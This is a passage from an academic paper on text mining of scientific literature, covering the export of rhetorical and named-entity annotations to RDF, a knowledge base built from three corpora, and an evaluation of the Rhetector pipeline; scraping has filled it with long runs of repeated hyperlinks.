http://www.semanticsoftware.info/munpex http://www.semanticsoftware.info/munpex http://www.semanticsoftware.info/munpex http://www.semanticsoftware.info/munpex http://www.semanticsoftware.info/munpex http://www.semanticsoftware.info/lodexporter http://www.semanticsoftware.info/lodexporter http://www.semanticsoftware.info/lodexporter http://www.semanticsoftware.info/lodexporter http://www.semanticsoftware.info/lodexporter http://www.semanticsoftware.info/lodexporter http://www.semanticsoftware.info/lodexporter http://www.semanticsoftware.info/lodexporter http://www.semanticsoftware.info/lodexporter http://www.semanticsoftware.info/lodexporter http://www.semanticsoftware.info/lodexporter http://dx.doi.org/10.7717/peerj-cs.37 Figure 6 Example rules, expressed in RDF, declaring how GATE annotations should be mapped to RDF for knowledge base population, including the definition of LOD vocabularies to be used for the created triples. semanticsoftware.info/lodexporter), a GATE plugin that uses the Apache Jena (http:// jena.apache.org) framework to export annotations to RDF triples, according to a set of custom mapping rules that refer to the vocabularies described in ‘Semantic representation of entities’ (cf. Table 1). The mapping rules themselves are also expressed using RDF and explicitly define which annotation types have to be exported and what vocabularies and relations must be used to create a new triple in the knowledge base. Using this file, each annotation becomes the subject of a new triple, with a custom predicate and its attributes, such as its features, as the object. The example annotation mapping rules shown in Fig. 6 describe export specifications of RhetoricalEntity and DBpediaNE annotations in GATE documents to instances of Sateli and Witte (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.37 16/27 https://peerj.com/computer-science/ http://www.semanticsoftware.info/lodexporter http://www.semanticsoftware.info/lodexporter http://www.semanticsoftware.info/lodexporter http://www.semanticsoftware.info/lodexporter http://www.semanticsoftware.info/lodexporter http://www.semanticsoftware.info/lodexporter http://www.semanticsoftware.info/lodexporter http://www.semanticsoftware.info/lodexporter http://www.semanticsoftware.info/lodexporter http://www.semanticsoftware.info/lodexporter http://www.semanticsoftware.info/lodexporter http://www.semanticsoftware.info/lodexporter http://www.semanticsoftware.info/lodexporter http://www.semanticsoftware.info/lodexporter http://www.semanticsoftware.info/lodexporter http://www.semanticsoftware.info/lodexporter http://www.semanticsoftware.info/lodexporter http://www.semanticsoftware.info/lodexporter http://www.semanticsoftware.info/lodexporter http://www.semanticsoftware.info/lodexporter http://www.semanticsoftware.info/lodexporter http://www.semanticsoftware.info/lodexporter http://www.semanticsoftware.info/lodexporter http://www.semanticsoftware.info/lodexporter http://www.semanticsoftware.info/lodexporter http://www.semanticsoftware.info/lodexporter http://www.semanticsoftware.info/lodexporter http://www.semanticsoftware.info/lodexporter http://www.semanticsoftware.info/lodexporter http://www.semanticsoftware.info/lodexporter http://www.semanticsoftware.info/lodexporter http://www.semanticsoftware.info/lodexporter http://www.semanticsoftware.info/lodexporter http://jena.apache.org http://jena.apache.org http://jena.apache.org http://jena.apache.org http://jena.apache.org http://jena.apache.org http://jena.apache.org http://jena.apache.org http://jena.apache.org http://jena.apache.org http://jena.apache.org http://jena.apache.org http://jena.apache.org http://jena.apache.org http://jena.apache.org http://jena.apache.org http://jena.apache.org http://jena.apache.org http://jena.apache.org http://jena.apache.org http://jena.apache.org http://jena.apache.org http://dx.doi.org/10.7717/peerj-cs.37 Figure 7 Example RDF triples generated using our publication modeling schema. The RDF graph here represents the rhetorical and named entities annotated in a document, shown in Figs. 4 and 5, created through the mapping rules shown in Fig. 6. RhetoricalElement and LinkedNamedEntity classes in the SRO and PUBO ontologies, respectively. The verbatim content of each annotation and the URI feature of each DBpediaNE is also exported using the defined predicates. Finally, using the relation mapping rule, each DBpediaNE annotation that is contained within the span of a detected RhetoricalEntity is connected to the RE instance in the knowledge base using the pubo:containsNE predicate. Ultimately, the generated RDF triples are stored in a scalable, TDB-based11 triplestore. An example RDF graph output for the mapping rules 11 Apache TDB, http://jena.apache.org/ documentation/tdb/ from Fig. 6 is illustrated in Fig. 7. EVALUATION We use three open-access corpora in our experiments: 1. The SePublica corpus contains 29 documents from the proceedings of the Semantic Publishing workshops12 from 2011 to 2014. 12 Semantic Publishing Workshop (SePub- lica), http://sepublica.mywikipaper.org/ drupal/ 2. PeerJCompSci is a collection of 27 open-access papers from the computer science edition of the PeerJ journal.13 13 PeerJ Computer Science Journal, https:// peerj.com/computer-science/ 3. AZ is a collection of 80 conference articles in computational linguistics, originally curated by Teufel (2010).14 14 Argumentation Zoning (AZ) Cor- pus, http://www.cl.cam.ac.uk/∼sht25/ AZ corpus.html The documents in these corpora are in PDF or XML formats, and range from 3 to 43 pages in various formats (ACM, LNCS, and PeerJ). We scraped the text from all files, analyzed them with our text mining pipeline described in the ‘Implementation’ section, and stored the extracted knowledge in a TDB-based triplestore.15 15 The generated knowledge base is also available for download on our supplements page, http://www. semanticsoftware.info/semantic- scientific-literature-peerj-2015- supplements Quantitative analysis of the populated knowledge base Table 2 shows the quantitative results of the populated knowledge base.16 The total number 16 The table is automatically generated through a number of SPARQL queries on the knowledge base; the source code to reproduce it can also be found on our supplementary materials page, http://www.semanticsoftware.info/ semantic-scientific-literature-peerj- 2015-supplements of RDF triples generated is 1,086,051. On average, the processing time of extracting REs, NEs, as well as the triplification of their relations was 5.55, 2.98 and 2.80 seconds per document for the PeerJCompSci, SePublica and AZ corpus, respectively; with the DBpedia Sateli and Witte (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.37 17/27 https://peerj.com/computer-science/ http://jena.apache.org/documentation/tdb/ http://jena.apache.org/documentation/tdb/ http://jena.apache.org/documentation/tdb/ http://jena.apache.org/documentation/tdb/ http://jena.apache.org/documentation/tdb/ http://jena.apache.org/documentation/tdb/ http://jena.apache.org/documentation/tdb/ http://jena.apache.org/documentation/tdb/ http://jena.apache.org/documentation/tdb/ http://jena.apache.org/documentation/tdb/ http://jena.apache.org/documentation/tdb/ http://jena.apache.org/documentation/tdb/ http://jena.apache.org/documentation/tdb/ http://jena.apache.org/documentation/tdb/ http://jena.apache.org/documentation/tdb/ http://jena.apache.org/documentation/tdb/ http://jena.apache.org/documentation/tdb/ http://jena.apache.org/documentation/tdb/ http://jena.apache.org/documentation/tdb/ http://jena.apache.org/documentation/tdb/ http://jena.apache.org/documentation/tdb/ http://jena.apache.org/documentation/tdb/ http://jena.apache.org/documentation/tdb/ http://jena.apache.org/documentation/tdb/ http://jena.apache.org/documentation/tdb/ http://jena.apache.org/documentation/tdb/ http://jena.apache.org/documentation/tdb/ http://jena.apache.org/documentation/tdb/ http://jena.apache.org/documentation/tdb/ http://jena.apache.org/documentation/tdb/ http://jena.apache.org/documentation/tdb/ http://jena.apache.org/documentation/tdb/ http://jena.apache.org/documentation/tdb/ http://jena.apache.org/documentation/tdb/ http://jena.apache.org/documentation/tdb/ http://jena.apache.org/documentation/tdb/ http://jena.apache.org/documentation/tdb/ http://jena.apache.org/documentation/tdb/ http://jena.apache.org/documentation/tdb/ http://jena.apache.org/documentation/tdb/ http://jena.apache.org/documentation/tdb/ http://sepublica.mywikipaper.org/drupal/ http://sepublica.mywikipaper.org/drupal/ http://sepublica.mywikipaper.org/drupal/ http://sepublica.mywikipaper.org/drupal/ http://sepublica.mywikipaper.org/drupal/ http://sepublica.mywikipaper.org/drupal/ http://sepublica.mywikipaper.org/drupal/ http://sepublica.mywikipaper.org/drupal/ http://sepublica.mywikipaper.org/drupal/ http://sepublica.mywikipaper.org/drupal/ http://sepublica.mywikipaper.org/drupal/ http://sepublica.mywikipaper.org/drupal/ http://sepublica.mywikipaper.org/drupal/ http://sepublica.mywikipaper.org/drupal/ http://sepublica.mywikipaper.org/drupal/ http://sepublica.mywikipaper.org/drupal/ http://sepublica.mywikipaper.org/drupal/ http://sepublica.mywikipaper.org/drupal/ http://sepublica.mywikipaper.org/drupal/ http://sepublica.mywikipaper.org/drupal/ http://sepublica.mywikipaper.org/drupal/ http://sepublica.mywikipaper.org/drupal/ http://sepublica.mywikipaper.org/drupal/ http://sepublica.mywikipaper.org/drupal/ http://sepublica.mywikipaper.org/drupal/ http://sepublica.mywikipaper.org/drupal/ http://sepublica.mywikipaper.org/drupal/ http://sepublica.mywikipaper.org/drupal/ http://sepublica.mywikipaper.org/drupal/ http://sepublica.mywikipaper.org/drupal/ http://sepublica.mywikipaper.org/drupal/ http://sepublica.mywikipaper.org/drupal/ http://sepublica.mywikipaper.org/drupal/ http://sepublica.mywikipaper.org/drupal/ http://sepublica.mywikipaper.org/drupal/ http://sepublica.mywikipaper.org/drupal/ http://sepublica.mywikipaper.org/drupal/ http://sepublica.mywikipaper.org/drupal/ http://sepublica.mywikipaper.org/drupal/ http://sepublica.mywikipaper.org/drupal/ https://peerj.com/computer-science/ https://peerj.com/computer-science/ https://peerj.com/computer-science/ https://peerj.com/computer-science/ https://peerj.com/computer-science/ https://peerj.com/computer-science/ https://peerj.com/computer-science/ https://peerj.com/computer-science/ https://peerj.com/computer-science/ https://peerj.com/computer-science/ https://peerj.com/computer-science/ https://peerj.com/computer-science/ https://peerj.com/computer-science/ https://peerj.com/computer-science/ https://peerj.com/computer-science/ https://peerj.com/computer-science/ https://peerj.com/computer-science/ https://peerj.com/computer-science/ https://peerj.com/computer-science/ https://peerj.com/computer-science/ https://peerj.com/computer-science/ https://peerj.com/computer-science/ https://peerj.com/computer-science/ https://peerj.com/computer-science/ https://peerj.com/computer-science/ https://peerj.com/computer-science/ https://peerj.com/computer-science/ https://peerj.com/computer-science/ https://peerj.com/computer-science/ https://peerj.com/computer-science/ https://peerj.com/computer-science/ https://peerj.com/computer-science/ https://peerj.com/computer-science/ https://peerj.com/computer-science/ https://peerj.com/computer-science/ http://www.cl.cam.ac.uk/~sht25/AZ_corpus.html http://www.cl.cam.ac.uk/~sht25/AZ_corpus.html http://www.cl.cam.ac.uk/~sht25/AZ_corpus.html http://www.cl.cam.ac.uk/~sht25/AZ_corpus.html http://www.cl.cam.ac.uk/~sht25/AZ_corpus.html http://www.cl.cam.ac.uk/~sht25/AZ_corpus.html http://www.cl.cam.ac.uk/~sht25/AZ_corpus.html http://www.cl.cam.ac.uk/~sht25/AZ_corpus.html http://www.cl.cam.ac.uk/~sht25/AZ_corpus.html http://www.cl.cam.ac.uk/~sht25/AZ_corpus.html http://www.cl.cam.ac.uk/~sht25/AZ_corpus.html http://www.cl.cam.ac.uk/~sht25/AZ_corpus.html http://www.cl.cam.ac.uk/~sht25/AZ_corpus.html http://www.cl.cam.ac.uk/~sht25/AZ_corpus.html http://www.cl.cam.ac.uk/~sht25/AZ_corpus.html http://www.cl.cam.ac.uk/~sht25/AZ_corpus.html http://www.cl.cam.ac.uk/~sht25/AZ_corpus.html http://www.cl.cam.ac.uk/~sht25/AZ_corpus.html http://www.cl.cam.ac.uk/~sht25/AZ_corpus.html http://www.cl.cam.ac.uk/~sht25/AZ_corpus.html http://www.cl.cam.ac.uk/~sht25/AZ_corpus.html http://www.cl.cam.ac.uk/~sht25/AZ_corpus.html http://www.cl.cam.ac.uk/~sht25/AZ_corpus.html http://www.cl.cam.ac.uk/~sht25/AZ_corpus.html http://www.cl.cam.ac.uk/~sht25/AZ_corpus.html http://www.cl.cam.ac.uk/~sht25/AZ_corpus.html http://www.cl.cam.ac.uk/~sht25/AZ_corpus.html http://www.cl.cam.ac.uk/~sht25/AZ_corpus.html http://www.cl.cam.ac.uk/~sht25/AZ_corpus.html http://www.cl.cam.ac.uk/~sht25/AZ_corpus.html http://www.cl.cam.ac.uk/~sht25/AZ_corpus.html http://www.cl.cam.ac.uk/~sht25/AZ_corpus.html http://www.cl.cam.ac.uk/~sht25/AZ_corpus.html http://www.cl.cam.ac.uk/~sht25/AZ_corpus.html http://www.cl.cam.ac.uk/~sht25/AZ_corpus.html http://www.cl.cam.ac.uk/~sht25/AZ_corpus.html http://www.cl.cam.ac.uk/~sht25/AZ_corpus.html http://www.cl.cam.ac.uk/~sht25/AZ_corpus.html http://www.cl.cam.ac.uk/~sht25/AZ_corpus.html http://www.cl.cam.ac.uk/~sht25/AZ_corpus.html http://www.cl.cam.ac.uk/~sht25/AZ_corpus.html http://www.cl.cam.ac.uk/~sht25/AZ_corpus.html http://www.cl.cam.ac.uk/~sht25/AZ_corpus.html http://www.cl.cam.ac.uk/~sht25/AZ_corpus.html http://www.cl.cam.ac.uk/~sht25/AZ_corpus.html http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://dx.doi.org/10.7717/peerj-cs.37 Table 2 Quantitative analysis of the populated knowledge base. We processed three corpora for REs and NEs. The columns ‘Distinct URIs’ and ‘Distinct DBpediaNE/RE’ count each URI only once throughout the KB, hence the total is not the sum of the individual corpora, as some URIs appear across them. Size DBpedia named entities Rhetorical entities Distinct DBpediaNE/RE Corpus ID Docs Sents Occurrences Distinct URIs Claims Contributions Claims Contributions AZ 80 16,803 74,896 6,992 170 463 563 900 PeerJCompSci 27 15,928 58,808 8,504 92 251 378 700 SePublica 29 8,459 31,241 4,915 54 165 189 437 Total 136 41,190 164,945 14,583 316 879 957 1,643 Spotlight annotation process taking up around 60% of the processing time (running on a standard 2013 quad-core desktop PC). For each corpus, we ran a number of queries on the knowledge base to count the occur- rences of NEs and REs in the contained documents. The ‘DBpedia Named Entities (Occur- rences)’ column shows the total number of NEs tagged by Spotlight, whereas the ‘DBpedia Named Entities (Distinct URIs)’ column shows the total of named entities with a unique URI. For example, if we have both “linked open data” and “LOD” tagged in a document, the total occurrence would be two, but since they are both grounded to the same URI (i.e., <dbpedia:Linked data>), the total distinct number of NEs is one. This is particularly interesting in relation to their distribution within the documents’ rhetorical zones (column ‘Distinct DBpedia NE/RE’). As can be seen in Table 2, the number of NEs within REs are an order of a magnitude smaller than the total number of distinct named entities throughout the whole papers. This holds across the three distinct corpora we evaluated. This experiment shows that NEs are not evenly distributed in scientific literature. Overall, this is encouraging for our hypothesis that the combination of NEs with REs brings added value, compared to either technique alone: as mentioned in the example above, a paper could mention a topic, such as “Linked Data,” but only as part of its motivation, literature review, or future work. In this case, while the topic appears in the document, the paper does not actually contain a contribution involving linked data. Relying on standard information retrieval techniques hence results in a large amount of noise when searching for literature with a particular contribution. Semantic queries on the other hand, as we propose them here, can easily identify relevant papers in a knowledge base, as we will show in the ‘Application’ section below. Text mining pipeline evaluation We assessed the performance of our text mining pipeline by conducting an intrinsic evaluation i.e., comparing its precision and recall with respect to a gold standard corpus. Gold standard corpus development and evaluation metrics In an intrinsic evaluation scenario, the output of an NLP pipeline is directly compared with a gold standard (also known as the ground truth) to assess its performance in a task. Towards this end, we manually curated a gold standard corpus of 30 documents, where 10 papers were randomly selected from each of the three datasets described in the ‘Evaluation’ Section. Sateli and Witte (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.37 18/27 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.37 Table 3 Statistics of our gold standard corpus. We manually annotated 30 documents from different sources with Claim and Contribution entities. The ‘Sentences’ and ’Tokens’ column shows the total number of sentences and tokens for each corpus. The ‘Annotated Rhetorical Entities’ column shows the number of annotations manually created by the authors in the corpus. Size Annotated Rhetorical Entities Corpus ID Documents Sentences Tokens Claims Contributions AZ 10 2,121 42,254 19 43 PeerJCompSci 10 5,306 94,271 36 62 SePublica 10 3,403 63,236 27 79 Total 30 10,830 199,761 82 184 These documents were then annotated by the first author in the GATE Developer graphical user interface (Cunningham et al., 2011). Each sentence containing a rhetorical entity was manually annotated and classified as either a Claim or Contribution by adding the respective class URI from the SRO ontology as the annotation feature. The annotated SePublica papers were used during system development, whereas the annotated AZ and PeerJCompSci documents were strictly used for testing only. Table 3 shows the statistics of our gold standard corpus. Note that both the AZ and PeerjCompSci gold standard documents are available with our supplements in full-text stand-off XML format, whereas for the SePublica corpus we currently can only include our annotations, as their license does not permit redistribution. For the evaluation, we ran our Rhetector pipeline on the evaluation corpus and computed the metrics precision (P), recall (R) and their F-measure (F-1.0), using GATE’s Corpus QA Tool (Cunningham et al., 2011). For each metric, we calculated the micro and macro average: in micro averaging, the evaluation corpus (composed of our three datasets) is treated as one large document, whereas in macro averaging, P, R and F are calculated on a per document basis, and then an average is computed (Cunningham et al., 2011). Intrinsic evaluation results and discussion Table 4 shows the results of our evaluation. On average, the Rhetector pipeline obtained a 0.73 F-measure on the evaluation dataset. We gained some additional insights into the performance of Rhetector. When comparing the AZ and SePublica corpora, we can see that the pipeline achieved almost the same F-measure for roughly the same amount of text, although the two datasets are from different disciplines: SePublica documents are semantic web-related workshop papers, whereas the AZ corpus contains conference articles in computational linguistics. Another interesting observation is the robustness of Rhetector’s performance when the size of an input document (i.e., its number of tokens) increases. For example, when comparing the AZ and PeerjCompSci performance, we observed only a 0.05 difference in the pipeline’s (micro) F-measure, even though the total number of tokens to process was doubled (42,254 vs. 94,271 tokens, respectively). Sateli and Witte (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.37 19/27 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.37 Table 4 Results of the intrinsic evaluation of Rhetector. We assessed the precision, recall and F-measure of our pipeline against a gold standard corpora. The ‘Detected Rhetorical Entities’ column shows the number of annotations generated by Rhetector. Detected Rhetorical Entities Precision Recall F-1.0 Corpus ID Claims Contributions Micro Macro Micro Macro Micro Macro AZ 22 44 0.73 0.76 0.76 0.81 0.74 0.78 PeerJCompSci 32 86 0.64 0.70 0.77 0.72 0.69 0.69 SePublica 28 85 0.70 0.72 0.74 0.78 0.72 0.73 Total 82 215 0.69 0.73 0.76 0.77 0.72 0.73 An error analysis of the intrinsic evaluation results showed that the recall of our pipeline suffers when: (i) the authors’ contribution is described in passive voice and the pipeline could not attribute it to the authors, (ii) the authors used unconventional metadiscourse elements; (iii) the rhetorical entity was contained in an embedded sentence; and (iv) the sentence splitter could not find the correct sentence boundary, hence the RE span covered more than one sentence. Accuracy of NE grounding with Spotlight To evaluate the accuracy of NE linking 